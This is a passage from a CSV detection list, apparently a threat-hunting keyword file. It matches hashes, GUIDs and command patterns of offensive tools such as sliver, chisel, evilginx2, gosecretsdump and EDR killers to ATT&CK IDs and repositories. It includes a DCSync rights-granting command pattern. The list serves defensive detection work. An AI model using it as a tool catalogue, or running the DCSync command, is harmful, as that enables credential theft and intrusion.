tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d75a64a4ef72a0c5bbdf8703bc5be50ee1569bad06a77a59e18a525c80c27a99*",".{0,1000}d75a64a4ef72a0c5bbdf8703bc5be50ee1569bad06a77a59e18a525c80c27a99.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*d780134609e2b5c9ec6b75e35c5f6eefcb1527105a584c6fbcff5dee33cebd37*",".{0,1000}d780134609e2b5c9ec6b75e35c5f6eefcb1527105a584c6fbcff5dee33cebd37.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*D78924E1-7F2B-4315-A2D2-24124C7828F8*",".{0,1000}D78924E1\-7F2B\-4315\-A2D2\-24124C7828F8.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","0","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*d7cfd598a2b8075da50af756bc164c272f247b69b1716b318b919f10cf0cfc8d*",".{0,1000}d7cfd598a2b8075da50af756bc164c272f247b69b1716b318b919f10cf0cfc8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*D7D20588-8C18-4796-B2A4-386AECF14256*",".{0,1000}D7D20588\-8C18\-4796\-B2A4\-386AECF14256.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" 
"*d7d5ed843d7c8543f15ad0b236d08c00c848c80480bae5f67083dae041ffcb67*",".{0,1000}d7d5ed843d7c8543f15ad0b236d08c00c848c80480bae5f67083dae041ffcb67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d80804bbcdbdd1933da9d9b7c0457ae73b85026e71970d1ab80af063b8fbac2e*",".{0,1000}d80804bbcdbdd1933da9d9b7c0457ae73b85026e71970d1ab80af063b8fbac2e.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*d80e2a137e1d2639c8e689549e5e17423f7ff19aa0bbfcab8e75b43c6c4b2d60*",".{0,1000}d80e2a137e1d2639c8e689549e5e17423f7ff19aa0bbfcab8e75b43c6c4b2d60.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d815672bd8c68dd861dac2266be662d32c22c7d07f13214ea84fd0cbd775ab92*",".{0,1000}d815672bd8c68dd861dac2266be662d32c22c7d07f13214ea84fd0cbd775ab92.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*d87c78f071b72de76e3569729f5dce81b6379a9ef115a5e4305e1e089531938e*",".{0,1000}d87c78f071b72de76e3569729f5dce81b6379a9ef115a5e4305e1e089531938e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d8891b478ae421a3c0abc85bfa2b4bab4c4d35d46a26ba9f7fc1c6b3d0d30009*",".{0,1000}d8891b478ae421a3c0abc85bfa2b4bab4c4d35d46a26ba9f7fc1c6b3d0d30009.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d88c69e0ca8a72f71d225ece1756c338ab37ec8af40bd0cdae4d9a73ad20457e*",".{0,1000}d88c69e0ca8a72f71d225ece1756c338ab37ec8af40bd0cdae4d9a73ad20457e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d8982f57fd89ad996df4e3abe1610118575d8ae93f06cc2564c230d1c5f99d36*",".{0,1000}d8982f57fd89ad996df4e3abe1610118575d8ae93f06cc2564c230d1c5f99d36.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*D8A76296-A666-46C7-9CA0-254BA97E3B7C*",".{0,1000}D8A76296\-A666\-46C7\-9CA0\-254BA97E3B7C.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*D8B2F4F4-2B59-4457-B710-F15844570997*",".{0,1000}D8B2F4F4\-2B59\-4457\-B710\-F15844570997.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 
- T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*D8BDABF6-6A96-4B48-8C1C-B6E78CBBF50E*",".{0,1000}D8BDABF6\-6A96\-4B48\-8C1C\-B6E78CBBF50E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77*",".{0,1000}d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*d8edc288ad36a1dc853851dfe2255647e17020a528f64ca22b07258f3c918118*",".{0,1000}d8edc288ad36a1dc853851dfe2255647e17020a528f64ca22b07258f3c918118.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D90EFC93-2F8B-4427-B967-0E78ED45611E*",".{0,1000}D90EFC93\-2F8B\-4427\-B967\-0E78ED45611E.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*d9137008fdb0e917c996162abb1b6d457b20c987958d4a5e496edc9666fa8392*",".{0,1000}d9137008fdb0e917c996162abb1b6d457b20c987958d4a5e496edc9666fa8392.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d919b4832a03cd1cc4c40803238e172dc2edd74317967546c4e485de14ddc5ba*",".{0,1000}d919b4832a03cd1cc4c40803238e172dc2edd74317967546c4e485de14ddc5ba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d92b4a40c783bf64d9117a9daf35b4f75426f7f1743d9939d756b327f608eda7*",".{0,1000}d92b4a40c783bf64d9117a9daf35b4f75426f7f1743d9939d756b327f608eda7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D934058E-A7DB-493F-A741-AE8E3DF867F4*",".{0,1000}D934058E\-A7DB\-493F\-A741\-AE8E3DF867F4.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*d941534ce99193cc7771684318af13748af81cf4a9a5b4fb02c791e066b563b2*",".{0,1000}d941534ce99193cc7771684318af13748af81cf4a9a5b4fb02c791e066b563b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d95bb95780308e82ee8ab7e0a2bb1867a94ab91f96ce11413ba02a15a16750f9*",".{0,1000}d95bb95780308e82ee8ab7e0a2bb1867a94ab91f96ce11413ba02a15a16750f9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d987f5f570ddac113c3083de784aac66b7550f639fb0cdd6d88bed99ae21821c*",".{0,1000}d987f5f570ddac113c3083de784aac66b7550f639fb0cdd6d88bed99ae21821c.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" 
"*d9940f5a09a04a949545eedb6818ce0ce001cc7596a63959e0940d31b6dc4834*",".{0,1000}d9940f5a09a04a949545eedb6818ce0ce001cc7596a63959e0940d31b6dc4834.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*d9c7dc1a5a792486cc3853620eb700e26a047238ba92c757b4f9d40605dbd3b8*",".{0,1000}d9c7dc1a5a792486cc3853620eb700e26a047238ba92c757b4f9d40605dbd3b8.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d9c8a6fa2ba159dea9e2bbeb86f0d329f996bbf51ff326d194968c2153aabea5*",".{0,1000}d9c8a6fa2ba159dea9e2bbeb86f0d329f996bbf51ff326d194968c2153aabea5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d9d30d28c1f342516cf9be162135f570ad63e591ce2a1a6056c96e525b635fbb*",".{0,1000}d9d30d28c1f342516cf9be162135f570ad63e591ce2a1a6056c96e525b635fbb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d9d5daaecd31c7616b01456da34cb3b51006b5a7697af4cadfa8167e7a8b6f81*",".{0,1000}d9d5daaecd31c7616b01456da34cb3b51006b5a7697af4cadfa8167e7a8b6f81.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" 
"*d9e138fbb6a18ba5a8f9405a45144f86211187609b158f862eba7a942360b3a1*",".{0,1000}d9e138fbb6a18ba5a8f9405a45144f86211187609b158f862eba7a942360b3a1.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*d9fd35586f323c9990b3da5c7c1f07c05ff88bc7*",".{0,1000}d9fd35586f323c9990b3da5c7c1f07c05ff88bc7.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*da130b91b87ce2cc4e21f221d51f2ee1d9a3052a1d414b7028a78ebf2fd8168c*",".{0,1000}da130b91b87ce2cc4e21f221d51f2ee1d9a3052a1d414b7028a78ebf2fd8168c.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*DA230B64-14EA-4D49-96E1-FA5EFED9010B*",".{0,1000}DA230B64\-14EA\-4D49\-96E1\-FA5EFED9010B.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*da23cfa752e49e813f9b47639456b433cbbdd0e4e50f4d0647c653ecce17ab97*",".{0,1000}da23cfa752e49e813f9b47639456b433cbbdd0e4e50f4d0647c653ecce17ab97.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*da2e2e4a0d34d63a452322f2fe5f57416aa79b6abb8a2a7cc3917a3b772d4cea*",".{0,1000}da2e2e4a0d34d63a452322f2fe5f57416aa79b6abb8a2a7cc3917a3b772d4cea.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*da5d6eca1efe3219fa8102a0afbf9823dc8b2c00dd53af20960ed29bca1b2cef*",".{0,1000}da5d6eca1efe3219fa8102a0afbf9823dc8b2c00dd53af20960ed29bca1b2cef.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" 
"*da6a12b87a18f943d1dd3f50a9f80313302efad3ce750c4073343d55f3b94b72*",".{0,1000}da6a12b87a18f943d1dd3f50a9f80313302efad3ce750c4073343d55f3b94b72.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*da6c929d77beb9a7cdb968a22a9e39343f27f0ac11672e11adaf3c773bd32c95*",".{0,1000}da6c929d77beb9a7cdb968a22a9e39343f27f0ac11672e11adaf3c773bd32c95.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*DA7DF89C-447D-4C2D-9C75-933037BF245E*",".{0,1000}DA7DF89C\-447D\-4C2D\-9C75\-933037BF245E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" 
"*da9ed4d88d12f0938c05fad2fcfe69ba3fd90b0bda98844cc886e5103ac62c93*",".{0,1000}da9ed4d88d12f0938c05fad2fcfe69ba3fd90b0bda98844cc886e5103ac62c93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dac2f647397f3465db18352b2cc0286948f5d00e4467eac9176c0b4318aa8ff1*",".{0,1000}dac2f647397f3465db18352b2cc0286948f5d00e4467eac9176c0b4318aa8ff1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dac48d1f87a5d34496182771b76988929cc81463c576110b866165902f30b3bf*",".{0,1000}dac48d1f87a5d34496182771b76988929cc81463c576110b866165902f30b3bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*dacledit.py -action write -rights DCSync -principal * -target-dn *",".{0,1000}dacledit\.py\s\-action\swrite\s\-rights\sDCSync\s\-principal\s.{0,1000}\s\-target\-dn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 